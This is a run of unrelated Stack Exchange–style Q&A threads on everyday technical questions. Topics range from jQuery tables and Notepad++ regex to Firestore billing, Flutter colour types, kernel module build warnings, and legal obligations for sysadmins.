Display temporary data client-side within table Please refer to this image, so I can explain the issue better. I have Master/Detail form (Bill of Materials in this case), which stores data in 2 database tables. The top of the form (Product,Quantity) is stored in the Master table, and with the inserted id(as FK), the Details table is populated with as many components and quantity entered below. But, until the final SAVE(submit) is pressed, I'm storing the component ID (value from the dropdown) and the quantity (from the input field) into JavaScript object within array: var products = []; $("#add").click(function(){ var prodname_fk = $("select").val(); var prodname = $("select option:selected").text(); var quantity = $("#quantity").val(); //Checks if the product or quantity has not been selected if (quantity == '' || prodname_fk == '') { alert("Please select product and quantity!"); return false; } //Pushes the Objects(products [id,quantity,prodname,uom]) into the Array products.push({id:prodname_fk,prodname:prodname,quantity:quantity}); //Test Purpose CONSOLE output var i = 0; $.each(products, function(){ console.log(products[i].id + " --> " + products[i].prodname + " --> " + products[i].quantity); i++; }); //Emptys the product and quantity $("select").val(""); $("#quantity").val(""); }); I also get the product name (text from the dropbox) for displaying purposes in the table below. So, my question is: How can I output the Component and Quantity in the table where it says "No Records!", after each ADD is pressed? (ADD does not submit or refresh the page) How can I add "delete" function in the same table for each object from the array? How can I check if a component exists already in the array, and just add up the quantity? This is my form: Thank you very much in advance! p.s. I'm trying to achieve something like this: How to store temporary data at the client-side and then send it to the server Oh, I forgot to note, I'm using PHP(Codeigniter)/MySQL. 
That's ok, so you could give the URL of the PHP file that will process the data and insert it into the database table, and then you could return the table to display from the PHP page... To add the values to your table, look at $.append() and $.appendTo(). Create your new row via $("<tr />") and append it to your table with $.appendTo(): var newRow = $("<tr />").appendTo("#myTable"); You now have a reference to the new row, so you can now append the cells: var newRow = $("<tr productId=\"" + prodname_fk + "\" />") .appendTo("#myTable") .append("<td class=\"code\" />") .append("<td class=\"component\">" + prodname + "</td>") .append("<td class=\"quantity\">" + quantity + "</td>") .append("<td class=\"uom\" />") .append("<td><span class=\"deleteButton\">delete</span></td>"); Delete the row like this: $("#myTable .deleteButton").click(function(e) { $(this).closest("tr").remove(); }); To handle storing the data I'd use an object rather than an array: var products = {}; $("#add").click(function() { ... if (prodname_fk in products) { products[prodname_fk].quantity += quantity; $("#myTable tr[productId='" + prodname_fk + "'] .quantity").text(products[prodname_fk].quantity) } else { products[prodname_fk] = { prodname:prodname, quantity:quantity }; var newRow = $("<tr productId=\"" + prodname_fk + "\" />") ... // append to table and append cells $(".deleteButton", newRow).click(function(e) { delete products[$(this).closest("tr").attr("productId")]; $(this).closest("tr").remove(); }); } ... }); Untested, so please forgive typos. The concepts are correct.
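The bookkeeping half of this answer (question 3 in the post: merging quantities when a component id is already present) can be separated from the DOM and sketched as plain functions. The names below are illustrative, not from the thread:

```javascript
// products maps product id -> { prodname, quantity }.
const products = {};

function addProduct(id, prodname, quantity) {
  if (id in products) {
    products[id].quantity += quantity;   // duplicate component: accumulate
  } else {
    products[id] = { prodname: prodname, quantity: quantity };
  }
  return products[id];
}

function removeProduct(id) {
  delete products[id];                   // mirrors the row's delete button
}

addProduct("7", "Bolt M6", 4);
addProduct("7", "Bolt M6", 2);           // existing id: quantity becomes 6
```

One caveat for the real click handler: $("#quantity").val() returns a string, so it should be run through parseInt (or Number) before being passed in, otherwise += will concatenate strings instead of adding numbers.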
Since you tagged it with Ajax, here is how you make an Ajax call and return the processed data. You need to make an XMLHttpRequest to the server; for that you need to create an XMLHttpRequest object in the JavaScript in your HTML page: var myxmlhttpobj=new GetXmlHttpObject(); function GetXmlHttpObject() { if (window.XMLHttpRequest) { // code for IE7+, Firefox, Chrome, Opera, Safari return new XMLHttpRequest(); } if (window.ActiveXObject) { // code for IE6, IE5 return new ActiveXObject("Microsoft.XMLHTTP"); } return null; } Now you need to make a request to the server from the JavaScript: var url="urlofPHPpage"; var para="parameter1=" + prodname_fk + "&parameter2=" + prodname + "&parameter3=" + quantity; myxmlhttpobj.open("POST",url,true); myxmlhttpobj.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); myxmlhttpobj.setRequestHeader("Content-length", para.length); myxmlhttpobj.setRequestHeader("Connection", "close"); myxmlhttpobj.onreadystatechange=ajaxComplete; myxmlhttpobj.send(para); At the server you need to process the input and send the result back as a string: process the input, prepare the table of the contents added, and write the output in the form of a string. When the request comes back, the ajaxComplete handler assigned to myxmlhttpobj.onreadystatechange will be called: function ajaxComplete(){ if(myxmlhttpobj.readyState==4){ ///Display the result on the HTML Page } } That should help... Also have a look at the jQuery Ajax API. One possible way is to put your temp data in hidden fields beside the normal visible fields; that way you can get the hidden fields' values easily using JavaScript and send them to the server. Also, because hidden fields are input tags, if you submit a form you can get the values on the server side like any other input tag.
Assuming you want to display this in an HTML table with thead and tbody elements, you can write something like this inside the click event of your add button: $('<tr>').append($('<td>').text(prodname)) .append($('<td>').text(quantity)) .append($('<td>').append($('<button>').text('Delete').addClass('Delete').attr('id', CurrentIDHere))) .appendTo('tbody'); You can place this code inside the click event of the add button after your validation logic. You can add a click handler for the Delete class where you get the id of the detail section and delete the corresponding entry from your array. The code is untested though. .append() returns the original jQuery object, not a reference to the newly created object. http://jsfiddle.net/gilly3/FYdCC/. You'll need to refactor a little to make that work. Yeah, I'm just testing it; will update the answer after a while. Try like this: .append($('<td>').text(prodname))
Replace each match with certain value using Notepad++ in one regular expression I have the following code in Adobe LiveCycle Designer FormCalc: if (form1.subform[0].complete_flag.rawValue == "1") then $.presence = "invisible"; endif I want to use N++ find/replace with a regular expression or similar to replace the above code to look like (to convert to JavaScript): if (form1.subform[0].complete_flag.rawValue == "1") { this.presence = "invisible"; } basically, in one run of find/replace, substitute the following: then ==> { $. ==> this. endif ==> } Is this possible using N++ or similar tools? Tarek The regex: (then)|(\$)|(endif) The replace: (?1{)(?2this)(?3}) This will work in Notepad++. A full explanation can be found here, but if that gets unlinked, the gist of it is this: The search looks for either of three alternatives separated by the |. Each alternative has its own capture brackets. The replace uses the conditional form ?Ntrue-expression:false-expression, where N is a decimal digit; the clause checks whether capture expression N matched. -AdrianHHH OMG! Thanks. It worked. I searched for this extensively and I didn't find it. Why is there a sad face next to your name above? That's my profile picture, in the same way that you have a picture of yourself next to your name in the question (and for any answers you post). Oh, OK. I just thought that this is related to some progress in this website. How can I find and delete comment lines (single-line comments using //)? I want to delete the entire line (remove it). The regex would be //.*, and you'd replace it with a blank string. I'd suggest you consider not deleting comments, though.
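The same one-pass trick works outside Notepad++. JavaScript's regex engine has no conditional replacement syntax like (?1{), but a replacer function keyed on the matched text gives the identical result:

```javascript
// Map each alternative of the pattern to its replacement in one pass.
const replacements = { "then": "{", "$.": "this.", "endif": "}" };

function formCalcToJs(src) {
  return src.replace(/then|\$\.|endif/g, (m) => replacements[m]);
}

const out = formCalcToJs(
  'if (form1.subform[0].complete_flag.rawValue == "1") then $.presence = "invisible"; endif'
);
// -> 'if (form1.subform[0].complete_flag.rawValue == "1") { this.presence = "invisible"; }'
```

On real source you would want word-boundary guards (\bthen\b, \bendif\b) so the keywords are not matched inside identifiers; the bare alternation here mirrors the Notepad++ pattern from the answer.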
Firestore read data count does not match documents queries count I have encountered an issue when trying to figure out and calculate the Firestore read count. The Firestore read count is always surging at a very high rate (100-count increments every time I reload the page) even though there are only around 15 user documents. Even when I am not reloading the page, the Firestore read count goes up by itself; is this due to the subscribe behaviour causing the read action to refresh from time to time? (I have read some articles recommending using "once" if the user wants to extract data just once.) Below is the code snippet (ts): // All buddy users from Firebase private usersCollection: AngularFirestoreCollection<Profile>; users: Observable<Profile[]>; usersFirebase: Profile[] = []; getUserDataFromFirebase() { this.isImageLoading = false; this.users.subscribe(async results => { var ref; for(let result of results) { if(result.imageName) { ref = this.store.ref('images/' + result.userId + '/profiles/' + result.imageName); } else { // Get default image if image not existing ref = this.store.ref('images/ironman.jpg'); } await ref.getDownloadURL().toPromise().then(urlString => { result.profileURL = urlString; // Change availability date from timestamp to date format try { result.availability = this.datePipe.transform(result.availability.toDate(), 'yyyy-MM-dd'); } catch (error) {} result.flip = 'inactive'; if(result.identity == 'Tenant') { this.usersFirebase.push(result); } return new Promise((resolve, reject) => { resolve(); }) }); } console.log(this.usersFirebase); }); } How does the Firestore read count work? Is the count incremented based on document queries? Will it continue to query itself after a certain amount of time? Firestore read count increases more than users documents The first thing to keep in mind is that any documents shown in the Firestore console also count towards your reads, so you'll want to close the console during these tests.
The read counts are focused on the number of documents retrieved. Let's set up these 4 scenarios: A collection of 10 users, you run a collection("users").get() call: you will get back 10 user documents, and be charged for 10 reads. A collection of 10,000 users, you run a collection("users").get() call: you will get back 10,000 users, and be charged for 10,000 reads. A collection of 10,000 users, you run a collection("users").limit(10).get() call: you will get back 10 users, and be charged for 10 reads. A collection of 10,000 users, 15 of which are named "Carl", and you run a collection("users").where("first_name", "==", "Carl") call: you will get back 15 users and be charged for 15 reads. On the other hand, if you are listening to the whole collection users (no where() or .orderBy() clauses) and you have an active onSnapshot() listener, then you will be charged for a document read operation each time a document is added, changed, or deleted in the collection users. You might want to take a look into your workflow to check whether other processes are making changes on your collection when checking the read operations. Finally, something to keep in mind is that the read ops in your report might not match the billing and quota usage. There is a feature request in the Public Issue Tracker related to this inquiry (reads on Firestore): here. You can "star" it and set the notifications to get updates on it. Also, you can create a new one if necessary.
How does the Amazon Prime Gaming rewards system work? I was wondering, whenever I log into Twitch, I see the notifications of past Amazon Prime Gaming rewards and most of them have a claim button. Since I have never bought the subscription, I wanted to know if I bought the subscription will I be able to claim these past rewards (or expired rewards?) or the claim button is a bug or an error that never got fixed? Every reward has a window you can claim it in. When the window passes you cannot get the reward anymore. If it has a claim button that window has not passed, and you can claim it while you have an active subscription. Once you claimed the items, you do not need the subscription to keep the items. You can see the status of all your claimable rewards at: https://gaming.amazon.com Old rewards whose windows have passed are removed from the list and are not visible. Ok, thanks for the question, I will mark it once i get the subscription. also another matter, my related amazon account has been banned and closed and requires contacting support for further access, but my twitch account still works without any problems so far, is it safe to buy the subscription without intending to verify my amazon account via support? will the subscription be available via twitch only? @Hitman2847 You'll almost certainly need an active Amazon account. You purchase a Prime subscription - which Prime Gaming is one of the benefits of - for your Amazon account, and then you can (optionally) link your Twitch and Amazon accounts to get the very few additional Twitch-specific benefits. All of the other benefits of Prime Gaming are available without having a Twitch account. ah, got it , so no way of getting it without verifying my account
Link prediction on network embeddings A picture is worth a thousand words, so I decided to illustrate how I imagine the procedure of link prediction on network embeddings. In the figure below the LR model stands for the "Logistic regression model". Train and test networks are composed of an equal number of positive and negative edges (training examples). My question is: should I learn embeddings on a network defined by positive edges only or should I also consider negative edges in the network embedding process? Any idea is appreciated. May be related: https://docs.ampligraph.org/en/1.2.0/ The short answer is: You are correct, in order to compute node embeddings you only need the "true" train edges. These edges span a training graph which is the input we give NE methods to learn the node embeddings. Non-edges are only used in the binary classification problem. The longer answer is: The most effective way to compute link predictions from embeddings is via binary classification. The node embeddings first need to be transformed into edge embeddings (e.g. averaging the embeddings of i and j to get the embedding of e=(i,j)) and then solve a binary classification problem. The binary classifier (usually Logistic regression) will take the edge embeddings as examples and try to learn a mapping to their corresponding "label" where these labels are 1 for the "true" edges and 0 for the non-edges. Therefore, in addition to the edge embeddings of "true" graph edges, we need to compute the edge embeddings of a set of non-edges in the graphs (those with label 0). This is what we usually refer to when we talk about negative sampling for LP. I believe the confusion here comes from the way some popular NE algorithms compute the embeddings. For instance, methods base on matrix factorization directly take the train graph you give as input, compute the adjacency matrix, factorize it and return the node embeddings. Other methods e.g. 
Deepwalk, Node2vec or LINE have a special way of learning embeddings (Skip-gram from the word embedding literature) and require "negative sampling" in the embedding learning process itself. These methods will select, from the train graph you give them, a set of non-edges or pairs of unconnected nodes to learn which node vectors should be put close together and which should be far apart. The NE methods will select these samples of non-edges themselves and in different ways, so the user generally doesn't have any control over it. I hope this clarifies your question. To add to the other answer: If you want just to make predictions, all your data is training data and you can make predictions for data that you have not seen. You do not need to split your data into two parts. The splitting is hence only useful to evaluate the performance of link prediction methods. Your drawing above does not reflect a standard machine learning pipeline. Unbiased estimates of performance can be computed only in the following manner: from the train data you construct a model (which here would be two parts: the network embedding and the binary classifier such as logistic regression), from which you can make predictions. You evaluate the predictions on the ground truth that was withheld from the learning process, which is the test set. Hence, the pipeline would be: Left-hand side: Train network -> Network embedding -> LR model -> Predictions Right-hand side: Test network -> Evaluation Cross link from left-hand side 'Predictions' directly to right-hand side 'Evaluation'. So, the predictions are made from the model (for example logistic regression, which is in turn based on a network embedding), which is learned on the training data. This is true not just in this link prediction setting but generally for any machine-learning model evaluation setting.
As an additional remark, there is no way to align network embeddings learned on the train and the test network, so an approach including a new embedding on the test set would not make sense. Hopefully this clarifies the setting?
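The node-to-edge step described in the first answer (averaging the embeddings of i and j) is a one-liner; here is a hedged sketch, with a logistic score over a dot product standing in for the trained classifier. The weights are hypothetical placeholders, not learned values:

```javascript
// Average two node embeddings to get the edge embedding of (i, j),
// as the answer describes.
function edgeEmbedding(u, v) {
  return u.map((x, k) => (x + v[k]) / 2);
}

// Stand-in scorer: sigmoid of a dot product with (assumed, already
// trained) logistic-regression weights w and bias b.
function linkScore(edge, w, b) {
  const z = edge.reduce((s, x, k) => s + x * w[k], b);
  return 1 / (1 + Math.exp(-z));   // probability the edge exists
}

const e = edgeEmbedding([1, 0, 2], [3, 2, 0]);  // -> [2, 1, 1]
```

Other node-pair operators from the node2vec paper (Hadamard product, L1/L2 distance) drop in the same way; only edgeEmbedding changes, the classifier side is untouched.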
How to add delay to Javascript transition? This is my Javascript code - var slideshows = document.querySelectorAll('[data-component="slideshow"]'); slideshows.forEach(initSlideShow); function initSlideShow(slideshow) { var slides = document.querySelectorAll(`#${slideshow.id} [role="list"] .slide`); var index = 0, time = 10000; slides[index].classList.add('active'); setInterval( () => { slides[index].classList.remove('active'); index++; if (index === slides.length) index = 0; slides[index].classList.add('active'); }, time); } This is my markup - <?php foreach( $hero_images as $image_id ): ?> <div class="slide" style="background-image: linear-gradient(rgba(0,0,0, 0.5), rgba(0,0,0, 0.5)), url('<?php echo wp_get_attachment_image_url( $image_id, 'full' ); ?>')"> <div class="text"> <h1>Example</h1> </div> </div> </div> <?php endforeach; ?> I have an array of images from WordPress and have them in the background of the parent div. This is the CSS - [data-component="slideshow"] .slide { display: none; } [data-component="slideshow"] .slide.active { display: block; } It just toggles the CSS display rule. The code works and the divs transition between display none and display block, but I want the transition to be smoother. I want to add a fade-in. I thought something like this would do it - .slide { opacity: 0; transition: 1s; } .active { opacity: 1 !important; transition: 1s; } But it does not have any effect. Is it possible to add a delay to the transition of display:none to display:block? It is not possible to control the transition from display none to some other value. What you can do is use some other property to accomplish the transition. For example, you can use the opacity property (a decent solution for fade in / fade out effects) or the transform: scale() property (does a good job if you desire to gradually increase/decrease content in size). EDIT: I now see you posted an example with opacity. Imho, that should work.
Your .active selector should be .slide.active, not just .active. You can use a keyframe animation to control the timing of your attributes more accurately. Here is an example of a fade-in animation (on click) using keyframes: $(".testcontainer").addClass("anim"); $(".outerContainer").on("click",function(){ $(this).find(".testcontainer").toggleClass("active"); }); .testcontainer{ width:100%; height:100%; background:green; opacity:0; display:none; } .outerContainer{ border: 1px solid black; height:200px; width:600px; } .outerContainer .testcontainer.active{ animation-duration: 2s; animation-name: fadeIn; display:block; opacity:1; } @keyframes fadeIn { 0% { opacity: 0; display:block; } 100% { opacity: 1; } } <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.7.1/jquery.min.js"></script> <div class="outerContainer"> <div class="testcontainer"> </div> </div> I would still recommend using a library like jQuery or pure JavaScript for animations like this, since it's a lot simpler to implement animations that way. If you have the creative freedom to choose, of course.
hello-1.mod.c:14: warning: missing initializer (near initialization for '__this_module.arch.unw_sec_init') I am trying to write a module for an sbc1651. Since the device is ARM, this requires a cross-compile. As a start, I am trying to compile the "Hello Kernel" module found here. This compiles fine on my x86 development system, but when I try to cross-compile I get the below warning. /home/developer/HelloKernel/hello-1.mod.c:14: warning: missing initializer /home/developer/HelloKernel/hello-1.mod.c:14: warning: (near initialization for '__this_module.arch.unw_sec_init') Since this is in the .mod.c file, which is autogenerated I have no idea what's going on. The mod.c file seems to be generated by the module.h file. As far as I can tell, the relevant parts are the same between my x86 system's module.h and the arm kernel header's module.h. Adding to my confusion, this problem is either not googleable (by me...) or hasn't happened to anyone before. Or I'm just doing something clueless that anyone with any sense wouldn't do. The cross-compiler I'm using was supplied by Freescale (I think). I suppose it could be a problem with the compiler. Would it be worth trying to build the toolchain myself? Obviously, since this is a warning, I could ignore it, but since it's so strange, I am worried about it, and would like to at least know the cause... 
Thanks very much, Sompom Here are the source files hello-1.mod.c #include <linux/module.h> #include <linux/vermagic.h> #include <linux/compiler.h> MODULE_INFO(vermagic, VERMAGIC_STRING); struct module __this_module __attribute__((section(".gnu.linkonce.this_module"))) = { .name = KBUILD_MODNAME, .init = init_module, #ifdef CONFIG_MODULE_UNLOAD .exit = cleanup_module, #endif .arch = MODULE_ARCH_INIT, }; static const struct modversion_info ____versions[] __used __attribute__((section("__versions"))) = { { 0x3972220f, "module_layout" }, { 0xefd6cf06, "__aeabi_unwind_cpp_pr0" }, { 0xea147363, "printk" }, }; static const char __module_depends[] __used __attribute__((section(".modinfo"))) = "depends="; hello-1.c (modified slightly from the given link) /* hello-1.c - The simplest kernel module. * * Copyright (C) 2001 by Peter Jay Salzman * * 08/02/2006 - Updated by Rodrigo Rubira Branco<EMAIL_ADDRESS> */ /* Kernel Programming */ #ifndef MODULE #define MODULE #endif #ifndef LINUX #define LINUX #endif #ifndef __KERNEL__ #define __KERNEL__ #endif #include <linux/module.h> /* Needed by all modules */ #include <linux/kernel.h> /* Needed for KERN_ALERT */ static int hello_init_module(void) { printk(KERN_ALERT "Hello world 1.\n"); /* A non 0 return means init_module failed; module can't be loaded.*/ return 0; } static void hello_cleanup_module(void) { printk(KERN_ALERT "Goodbye world 1.\n"); } module_init(hello_init_module); module_exit(hello_cleanup_module); MODULE_LICENSE("GPL"); Makefile export ARCH:=arm export CCPREFIX:=/opt/freescale/usr/local/gcc-4.4.4-glibc-2.11.1-multilib-1.0/arm-fsl-linux-gnueabi/bin/arm-linux- export CROSS_COMPILE:=${CCPREFIX} TARGET := hello-1 WARN := -W -Wall -Wstrict-prototypes -Wmissing-prototypes -Wno-sign-compare -Wno-unused -Werror UNUSED_FLAGS := -std=c99 -pedantic EXTRA_CFLAGS := -O2 -DMODULE -D__KERNEL__ ${WARN} ${INCLUDE} KDIR ?= /home/developer/src/ltib-microsys/ltib/rpm/BUILD/linux-<IP_ADDRESS> ifneq ($(KERNELRELEASE),) # kbuild part of 
makefile obj-m := $(TARGET).o else # normal makefile default: clean $(MAKE) -C $(KDIR) M=$$PWD .PHONY: clean clean: -rm built-in.o -rm $(TARGET).ko -rm $(TARGET).ko.unsigned -rm $(TARGET).mod.c -rm $(TARGET).mod.o -rm $(TARGET).o -rm modules.order -rm Module.symvers endif Hi there, welcome to SO. Could you please edit your question to clarify which errors you are getting and when? The error in the title is a warning you see when you compile locally? but the error in the question is when you cross compile? Hi @Deepend, The error is the same, just that I compressed the error in the title onto one line to make it less unwieldy. Thanks, Sompom Looks like the macro MODULE_ARCH_INIT is undefined when the the preprocessor gets to line 14. Maybe it was in the regular compiler makefile but not the cross-compiler makefile? Hmm. I copied the same Makefile, only adding the top three "export" lines to make it cross-compile. The reference I have to that macro is http://lxr.free-electrons.com/source/include/linux/module.h?v=2.6.34#L383 . The cross-compiling kernel headers have the same reference in the same place. The line doesn't make any sense to me, since if it's defining it as {}, it would do nothing. But I suppose that's what I'm seeing. @Deepend Your last edit suggestion was incorrect, I think: the OP was correct in classifying this as a warning rather than an error, and already explained that it happened when cross-compiling. @hvd Changed that to warning. I moved the reference to cross-compile from below the warning to above to improve the flow of English. @Deepend Thanks. Personally I think that was minor enough that it could be left as is, but if you did think it was unclear as it was, you were right to suggest to change it. First, that statement that a warning can be ignored is (almost) always false. Warnings should/must always be fixed. Apparently MODULE_ARCH_INIT is a macro defined as some sort of { ... } initializer. 
GCC is known for issuing overly paranoid (and downright malicious) warnings for such initializers when they don't cover every field in the target aggregate, even though the language spec says that everything is OK. Here is an example of that warning issued for the perfectly safe (and idiomatic) = { 0 } initializer: Why is the compiler throwing this warning: "missing initializer"? Isn't the structure initialized? I'd guess that your MODULE_ARCH_INIT is defined as something that does not cover every field of the target struct and triggers the very same warning for the very same reason. The language guarantees that in such cases non-covered fields are zero-initialized, but GCC is just not sure whether zero is what you want to initialize those fields with. Hence the warning.
common-pile/stackexchange_filtered
The argument type 'Color?' can't be assigned to the parameter type 'MaterialColor?' I want to set the background to Colors.yellow[700] in Flutter, but when I add the "[]" symbols or use Colors.yellow.shade600, I can't set the value for the background. It shows an error, and the error is The argument type 'MaterialColor' can't be assigned to the parameter type 'Paint' If you want primarySwatch with Colors.yellow[700] as primaryColor, you would have to create your own MaterialColor from the color Colors.yellow[700], like this: final Map<int, Color> _yellow700Map = { 50: Color(0xFFFFD7C2), 100: Colors.yellow[100], 200: Colors.yellow[200], 300: Colors.yellow[300], 400: Colors.yellow[400], 500: Colors.yellow[500], 600: Colors.yellow[600], 700: Colors.yellow[800], 800: Colors.yellow[900], 900: Colors.yellow[700], }; final MaterialColor _yellow700Swatch = MaterialColor(Colors.yellow[700].value, _yellow700Map); and then add it as primarySwatch: _yellow700Swatch, or if you want only your background to be Colors.yellow[700], you can use canvasColor like this: canvasColor: Colors.yellow[700],.
Also, you can use the colorScheme property and set it like below (note that the shade values are not compile-time constants, so const must be dropped, and you should pass either the named shades or the raw RGB values, not both at once): theme: ThemeData( colorScheme: ColorScheme.fromSwatch().copyWith( primary: Colors.yellow[700], secondary: Colors.yellow.shade700, // or from RGB: // primary: const Color(0xFF343A40), // secondary: const Color(0xFFFFC107), ), ), primarySwatch only takes a MaterialColor (a ColorSwatch), not a single color shade; if you want to use a shade you can try ThemeData( primaryColor: Colors.yellow[700] ) and for more info see primaryColor. If you want to use your own custom colors in the primarySwatch of a theme, then declare this: MaterialColor mainAppColor = const MaterialColor(0xFF89cfbe, <int, Color>{ 50: Color(0xFF89cfbe), 100: Color(0xFF89cfbe), 200: Color(0xFF89cfbe), 300: Color(0xFF89cfbe), 400: Color(0xFF89cfbe), 500: Color(0xFF89cfbe), 600: Color(0xFF89cfbe), 700: Color(0xFF89cfbe), 800: Color(0xFF89cfbe), 900: Color(0xFF89cfbe), }, ); then in your themeData, apply this color to the primarySwatch like that: @override Widget build(BuildContext context) { return MaterialApp( theme: ThemeData( primarySwatch: mainAppColor, ), home: const SomeBlaBlaPage(), ); }
Therefore, whenever you want to create or reference a color in the Material framework, use the type MaterialColor rather than the plain Dart type Color. And be careful when you read a parameter named color or colors! Ask yourself whether that parameter is really of type MaterialColor rather than the plain Dart Color type. Many color elements in the Material framework are of type MaterialColor. Color dColor = const Color(0xFF42A5F5); // Dart MaterialColor mColor = Colors.green; // Material dColor = mColor; // OK: MaterialColor is a subtype of Color mColor = dColor; // Error: a plain Color is not a MaterialColor There is no automatic conversion from a plain Color to a MaterialColor. And how do you solve the problem when I need a Color but have a value of MaterialColor type? Since MaterialColor extends Color, you can pass it directly wherever a Color is expected.
Check if working on a Databricks notebook or not For some functions I need to split logic between a Databricks notebook with a big cluster and local machines. So is there a way to check if R is running in a Databricks notebook? Like some tag in Sys.info() or something? You control the environment. Just set a variable on submit, and check it from the application. I found a solution in .Platform$GUI: if it is equal to RStudio (in my case only RStudio is used locally), this is a local machine; in other cases it is a Databricks notebook. This will be true for Linux as well, not only Databricks. You can try: if (NROW(grep('DATABRICKS', names(Sys.getenv()))) > 0 ){ print("We are on Databricks")}else{ print("We are not on Databricks")}
What legal gotchas should a sysadmin be familiar with? What legal issues should you research as a sysadmin to avoid you, or your employer, being accused of negligence, or of violating privacy, etc? While laws vary from country to country and state to state, it could still be enlightening if you have an example of a law which you, or someone you know, has broken without realizing it. Btw, wish I had a good synonym for "gotcha" - I hate that word. It largely depends on a few things, like what industry you're in (the following applies to the USA only)... Health Care: HIPAA Education: FERPA If your company is traded with the SEC: Sarbanes-Oxley If your company does credit card transactions - PCI DSS A lot of the smaller jobs I've worked have been pretty bad about PCI DSS: storing CC info in plaintext on a publicly accessible database server... basics that were just neglected. One of the challenges, particularly for small businesses, is that some of the regulations mentioned (HIPAA for instance) can be confusing or ambiguous. The theory is that the regs are written not to force companies to lock in to particular solutions, but taking that wiggle room for granted could be problematic. +1 @Milner, attempts in these regulations to be 'technology agnostic' leave little clear direction, which is both good and bad. The best most of us can do is have a clear Policy + Procedures that explains how you address the gray areas -- and then stick to it (or revise, then stick to it). Having to explain why you didn't follow your own SOP is a bad situation. Can we add the federal rules of discovery (http://www.law.com/jsp/legaltechnology/pubArticleLT.jsp?id=1202429657841&Guidelines_to_Craft_EMail_Retention_Policies) in the US (retention requirements).
Also, breach notification laws exist in many states, and a federal healthcare information breach notice standard was passed as part of ARRA and is currently being drafted (http://www.dwt.com/LearningCenter/Advisories?find=79311) The following applies to the USA only: CIPA: Children's Internet Protection Act Especially if you're employed by a state or federal educational entity: http://www.fcc.gov/cgb/consumerfacts/cipa.html FOIA: Freedom of Information Act Again, if you're employed by a government entity: http://www.fcc.gov/foia/ FERPA: Family Educational Rights and Privacy Act Education: http://www.ed.gov/policy/gen/guid/fpco/ferpa/index.html Child Porn - your business can go under because your servers were in a datacenter NEXT TO some servers that had child porn on them (in the US). You really can't be too paranoid about this. Be aware of the legal side of network analysis and intrusion detection. In some places, unauthorized use of nmap can be considered a crime, as can trying to break into systems for security (non-malicious) purposes. Be aware of software licensing issues, both for end users (if you deal with them) and for your servers and other sysadmins. Know the possible ramifications if you choose to run pirated software on a business server. Be aware of privacy laws for your place of business at the local, state, and federal level. Know what info you are and aren't allowed to store. Also know what info you are and aren't allowed to look at, both in legal terms and as laid down by your company guidelines. On the flip side, be aware of information retention laws for your place of business. Know what info you're required to keep, how long you need to keep it, and who you have to divulge it to when requested. Be able to draw the line between privacy and complying with regulations (and know when to stand up for one or the other). There's more to licensing than just piracy.
Much of the software we take for granted at home under liberal personal-use licenses is much more restrictively licensed for commercial use. It's not safe to assume it's freeware everywhere. I'm in the UK, and I'd say the most important laws to an average ecommerce business would be: The Data Protection Act Distance Selling Regulations and Trade Descriptions Act Certain parts of The Companies Act - for example, you have to have your registered company number and address on a business website even if you don't sell anything. I've seen that one broken many times. PCI Compliance (ok, not a law but important) This question can actually only be answered if you tell us where you are located. Personally, I consider the SysAdmin to be the person in charge of each and every bit of data, and thus the one who carries the largest risk when data is lost/exposed/abused (even if you won't face legal consequences, your boss will come to you and you will have to explain why on earth the data could get out of your company). I personally make sure that: In case it's needed, I can access each piece of information (everything; after all, I'm the one standing on the wrong side of the fan when shit hits it) I tell this to my boss I tell my boss that I won't access anything without permission I tell my boss that I will ask for another party to watch me and the requestor if I don't feel comfortable with the data access request I want all of the above signed and sealed in a written manner Other things I make sure of: Hear everything See everything Talk about nothing These points aren't about snooping around in files or anything like that; it's just about the regular chatting with colleagues and co-workers and trying to fit together the different pieces. "Talk about nothing" means not participating in the chatting beyond a certain point; people come to me regularly with requests about lost passwords, files to be restored or other stuff.
That could lead back to certain opinions about otherwise hard-working people; I don't want that. Tell everyone about the stuff my boss and I agreed on This can be in terms of talking from person to person, company mails or posters with friendly reminders that there's a party in the company that could access all data. These aren't exactly examples of laws colleagues or I stumbled over. But that is the part where "Talk about nothing" comes into play. Sorry to disappoint you with examples. Your Data Protection legislation. Your employer's AUP - know it inside out - it applies to you too! There are various state laws concerning PII (Personally Identifiable Information) in the event of a data breach. California's 1386 requires that everybody who was affected by the data breach (compromise of their information) must be notified. Many other states have similar provisions. Also, as a clarification on PCI-DSS, that is not a strictly legal requirement; the card brands (MasterCard, Visa, Discover, AmEx) require their merchant banks to require the vendors to adhere to PCI-DSS. If you violate PCI, you won't be prosecuted legally; however, you can be fined thousands of dollars a day (or more) by your merchant bank while you are in violation. If you don't come into compliance, you will eventually lose your ability to do credit card transactions, which would be a kiss of death for most online retailers. PCI DSS for customers who take credit cards, and the chance that every time you enable logging you might be required to produce those logs in the future. Sometimes it is better not to have recorded anything. E-discovery is a big "gotcha." These are the requirements in the US to preserve electronic information in the event of a lawsuit, and to make it available to the other party. The sysadmin should spend some time with the company's lawyers BEFORE the first time the company is sued so that you have a plan in place to comply with these requirements if you ever have to.
Failure to preserve all the necessary electronic records (and in the right way) immediately upon a lawsuit coming up can hurt the company tremendously (including losing a lawsuit that might not otherwise have been lost). In a policing or crown counsel environment, you need to be careful when handling digital evidence. The last thing you want is to be required to testify in court when all you did was help convert some sort of media from one format to another.
Partial Views using data grids I am trying to call in two partial views, but my program is trying to populate my web grid before I pass it a search parameter. I can't figure out how to keep it from trying to render the webgrid before I pass it the text in the searchbox. This is in my partial view: <div class="webgrid-wrapper"> <div class="webgrid-title">Values</div> <div id="grid"> @grid.GetHtml( tableStyle: "webgrid", headerStyle: "webgrid-header", footerStyle: "webgrid-footer", alternatingRowStyle: "webgrid-alternating-rows", columns: grid.Columns( grid.Column("Id", "ID"), grid.Column("Name", "Name") ) ) </div> </div> </div> This is my Home view, into which I'm pulling both of the partial views: <section class="featured"> <div class="content-wrapper"> <hgroup class="title"> <EMAIL_ADDRESS><EMAIL_ADDRESS> </hgroup> </div> </section> @using (Html.BeginForm("Analysis", "Home", "POST")) { <div class="searchField"> <div class="searchbox"> Search: <input type="text" name="Search" /> <input type="submit" value="Submit"> </div> </div> } @Html.Partial("PartialChemAnalysis") @Html.Partial("PartialSlagView") You can do this by checking whether the search parameter has a value; if not, then you don't have to render the grid. In your controller public ViewResult Analysis(string search) { ViewBag.DisplayGrid = !string.IsNullOrEmpty(search); // do your logic, then return } in your view @if (ViewBag.DisplayGrid != null && ViewBag.DisplayGrid) { // Render your partials since it's true. @Html.Partial("PartialChemAnalysis") @Html.Partial("PartialSlagView") } Upon initial load, or if 